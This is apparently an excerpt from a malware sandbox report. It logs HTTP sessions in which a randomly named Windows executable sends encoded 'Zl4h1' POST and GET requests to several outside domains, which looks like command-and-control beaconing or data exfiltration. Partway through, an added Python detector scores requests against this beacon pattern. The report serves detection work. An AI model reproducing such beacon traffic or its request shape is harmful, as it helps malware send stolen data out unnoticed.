                                                    Timestamp: Jun 9, 2024 18:00:38.475478888 CEST | Bytes transferred: 561 | Direction: IN | Data: HTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:38 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:38 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:38 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14148443470
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session ID: 11 | Source IP: 192.168.2.11 | Source Port: 49723 | Destination IP: 46.30.213.191 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:40.173988104 CEST | Bytes transferred: 1827 | Direction: OUT | Data: POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.antonio-vivaldi.mobi
                                                    Origin: http://www.antonio-vivaldi.mobi
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1= [TRUNCATED]
                                                    Timestamp: Jun 9, 2024 18:00:41.002940893 CEST | Bytes transferred: 561 | Direction: IN | Data: HTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 163
                                                    Expires: Sun, 09 Jun 2024 16:10:40 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:40 GMT
                                                    Location: https://musee.mobi/vivaldi/fo8o/
                                                    Date: Sun, 09 Jun 2024 16:00:40 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14220691878
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                    Session ID: 12 | Source IP: 192.168.2.11 | Source Port: 49724 | Destination IP: 46.30.213.191 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp: Jun 9, 2024 18:00:42.712661982 CEST | Bytes transferred: 512 | Direction: OUT | Data: GET /fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.antonio-vivaldi.mobi
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Timestamp: Jun 9, 2024 18:00:43.538681984 CEST | Bytes transferred: 851 | Direction: IN | Data: HTTP/1.1 302 Found
                                                    Cache-Control: max-age:600, public
                                                    Content-Length: 312
                                                    Expires: Sun, 09 Jun 2024 16:10:43 GMT
                                                    Last-Modified: Sun, 09 Jun 2024 16:00:43 GMT
                                                    Date: Sun, 09 Jun 2024 16:00:43 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    location: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85
                                                    X-Onecom-Cluster-Name:
                                                    X-Varnish: 14264139890
                                                    Age: 0
                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&amp;Pbw=PLVXbnG85" >here</a></p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.11 | 49725 | 85.159.66.93 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:00:48.973733902 CEST | 776 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 31 32 44 45 63 4c 46 49 4e 79 75 75 52 42 67 2b 61 39 5a 5a 74 71 37 63 54 53 53 41 48 58 4c 67 73 77 3d 3d
                                                    Data Ascii: Zl4h1=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R12DEcLFINyuuRBg+a9ZZtq7cTSSAHXLgsw==
                                                    Jun 9, 2024 18:00:49.939908028 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:49 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 17
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:50.2799408Z


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.11 | 49726 | 85.159.66.93 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:00:51.502248049 CEST | 796 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 7a 65 48 30 7a 77 4f 6d 75 70 33 31 34 55 71 54 34 6a 79 43 75 7a 6d 56 36 4b 2b 6f 68 44 4d 49 4d 3d
                                                    Data Ascii: Zl4h1=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5zeH0zwOmup314UqT4jyCuzmV6K+ohDMIM=
                                                    Jun 9, 2024 18:00:52.463092089 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:52 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 18
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.11 | 49727 | 85.159.66.93 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:00:54.035046101 CEST | 1809 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.magmadokum.com
                                                    Origin: http://www.magmadokum.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.magmadokum.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 79 33 54 69 55 4d 61 74 73 6d 2f 72 43 70 51 55 37 2b 54 57 4b 46 33 48 63 2b 76 79 6b 31 69 48 2b 48 36 47 4c 46 69 4a 4a 63 66 73 72 2b 61 55 59 77 4c 51 43 4e 33 73 52 45 68 32 64 6f 47 4d 63 6e 49 67 53 73 4a 32 4b 71 68 33 30 78 30 4b 4d 52 54 4f 4f 67 38 54 78 55 44 54 31 61 67 53 4a 65 41 49 33 38 77 37 74 69 2b 73 6b 58 6e 4d 4b 2f 55 2f 4a 4d 4f 73 39 47 51 49 70 78 55 77 32 4d 67 4d 47 39 78 67 77 68 57 74 75 72 44 7a 73 68 43 41 76 54 6d 64 50 70 2f 70 2b 44 33 6b 6f 64 [TRUNCATED]
                                                    Data Ascii: Zl4h1=... [TRUNCATED]
                                                    Jun 9, 2024 18:00:54.995521069 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:54 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 17
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:55.3357885Z


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.11 | 49728 | 85.159.66.93 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:00:56.564965010 CEST | 506 | OUT | GET /fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.magmadokum.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:00:57.476320028 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx/1.14.1
                                                    Date: Sun, 09 Jun 2024 16:00:57 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    X-Rate-Limit-Limit: 5s
                                                    X-Rate-Limit-Remaining: 18
                                                    X-Rate-Limit-Reset: 2024-06-09T16:00:57.8280283Z


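The four sessions against www.magmadokum.com above, and the four against www.rssnewscast.com that follow, share one request shape: three POSTs of growing size (202, 222 and 1234 body bytes) to the same short directory "/fo8o/", each carrying a single form field "Zl4h1" whose value looks like base64, with Origin and Referer set to the contacted host itself, then one GET repeating that field name in the query string with a second parameter "Pbw", all under an identical MSIE 8.0 / Windows NT 6.1 User-Agent. The server answers (404, 405, a parking page) do not matter for detection; the client behaviour does. The Python below is a detection example added to this report, not Joe Sandbox output and not code from the sample: it parses raw HTTP/1.1 request text in the format printed in the sessions and scores each request against those traits. It generalises beyond this capture by accepting any short directory and field name rather than the literal "/fo8o/" and "Zl4h1"; the regexes and the threshold are assumptions tuned to what is visible here. The embedded sample requests are constructed: header layout and field names copy the report, the payload values are shortened placeholders, and www.example.com is an assumed benign host.

```python
"""Detection example for the request shape seen in the sessions above.

Added for this report; not Joe Sandbox output and not code from the sample.
It parses raw HTTP/1.1 request text in the format printed in the sessions
and scores each request against the traits those sessions share.  The
regexes and the threshold are assumptions tuned to this capture.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Exact User-Agent carried by every request in the report.
BEACON_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; "
             "SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)")
PATH_RE = re.compile(r"^/[a-z0-9]{3,8}/$")          # one short directory, like /fo8o/
FIELD_RE = re.compile(r"^[A-Za-z0-9_-]{2,8}$")      # short random field name, like Zl4h1
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")  # base64-looking value


def _raw_pairs(s):
    """Split a form body or query string on '&' and the first '=' WITHOUT
    URL-decoding, so '+' and '/' inside base64 values survive intact
    (urllib.parse.parse_qsl would turn '+' into a space)."""
    pairs = []
    for part in s.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def parse_http_request(raw):
    """Parse raw request text (CRLF or LF line endings) into a dict."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "query": dict(_raw_pairs(url.query)),
            "form": dict(_raw_pairs(body)), "headers": headers}


def beacon_indicators(req):
    """Return the names of the beacon traits this request matches."""
    hits = []
    h = req["headers"]
    host = h.get("host", "")
    if h.get("user-agent") == BEACON_UA:
        hits.append("fixed_msie8_user_agent")
    if PATH_RE.match(req["path"]):
        hits.append("short_random_directory")
    if req["method"] == "POST":
        if len(req["form"]) == 1:
            (name, value), = req["form"].items()
            if FIELD_RE.match(name) and B64_RE.match(value):
                hits.append("single_base64_form_field")
        # The POSTs above set Origin and Referer to the contacted host itself,
        # which a browser only does for a form actually served by that host.
        if host and h.get("origin") == "http://" + host \
                and h.get("referer", "").startswith("http://" + host + "/"):
            hits.append("self_referencing_origin_and_referer")
    elif req["method"] == "GET" and len(req["query"]) == 2:
        names = list(req["query"])
        if all(FIELD_RE.match(n) for n in names) and B64_RE.match(req["query"][names[0]]):
            hits.append("base64_field_in_query")
    return hits


def beacon_hosts(requests, min_indicators=3):
    """Report hosts that received both a POST and a GET scoring at least
    min_indicators and sharing the same field name (in the report each
    domain gets three POSTs of growing size, then one GET)."""
    by_host = defaultdict(list)
    for req in requests:
        if len(beacon_indicators(req)) >= min_indicators:
            by_host[req["headers"].get("host", "")].append(req)
    flagged = {}
    for host, reqs in by_host.items():
        post_names = {n for r in reqs if r["method"] == "POST" for n in r["form"]}
        get_names = {n for r in reqs if r["method"] == "GET" for n in r["query"]}
        shared = sorted(post_names & get_names)
        if shared:
            flagged[host] = shared
    return flagged


# Constructed sample requests: header layout and field names copy the
# report, the payload values are shortened placeholders, www.example.com
# is an assumed benign host.
SAMPLE_POST = (
    "POST /fo8o/ HTTP/1.1\r\n"
    "Host: www.magmadokum.com\r\n"
    "Origin: http://www.magmadokum.com\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.magmadokum.com/fo8o/\r\n"
    f"User-Agent: {BEACON_UA}\r\n\r\n"
    "Zl4h1=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA=="
)
SAMPLE_GET = (
    "GET /fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1=&Pbw=PLVXbnG85 HTTP/1.1\r\n"
    "Host: www.magmadokum.com\r\n"
    "Connection: close\r\n"
    f"User-Agent: {BEACON_UA}\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET /index.html?page=2&lang=en HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/125.0\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_POST, SAMPLE_GET, SAMPLE_BENIGN):
        req = parse_http_request(raw)
        print(req["method"], req["headers"]["host"], beacon_indicators(req))
    print(beacon_hosts([parse_http_request(r) for r in (SAMPLE_POST, SAMPLE_GET, SAMPLE_BENIGN)]))
```

Of the traits, the fixed User-Agent and the self-referencing Origin/Referer are the least likely to appear in real browser traffic on a network without a genuine form at that path; the base64 field shape on its own is noisy, which is why beacon_hosts requires a POST and a GET on the same host to agree on the field name before flagging. Field names and directories are per-campaign values, so a rule should key on the shape, as here, rather than on "Zl4h1" or "/fo8o/".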
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.11 | 49729 | 91.195.240.94 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:02.682894945 CEST | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 6f 39 39 46 61 74 63 44 39 67 59 42 79 74 58 32 73 78 69 75 46 53 37 77 7a 77 5a 4a 63 54 72 68 51 67 3d 3d
                                                    Data Ascii: Zl4h1=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8o99FatcD9gYBytX2sxiuFS7wzwZJcTrhQg==
                                                    Jun 9, 2024 18:01:03.534750938 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Sun, 09 Jun 2024 16:01:03 GMT
                                                    content-type: text/html
                                                    content-length: 556
                                                    server: Parking/1.0
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.11 | 49730 | 91.195.240.94 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:05.225583076 CEST | 799 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.rssnewscast.com
                                                    Origin: http://www.rssnewscast.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.rssnewscast.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 7a 79 6e 57 34 35 56 69 4f 6f 4c 68 64 68 6d 61 43 37 71 4a 50 53 7a 67 32 50 4c 32 79 62 34 51 38 3d
                                                    Data Ascii: Zl4h1=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzynW45ViOoLhdhmaC7qJPSzg2PL2yb4Q8=
                                                    Jun 9, 2024 18:01:06.085066080 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                                                    date: Sun, 09 Jun 2024 16:01:05 GMT
                                                    content-type: text/html
                                                    content-length: 556
                                                    server: Parking/1.0
                                                    connection: close
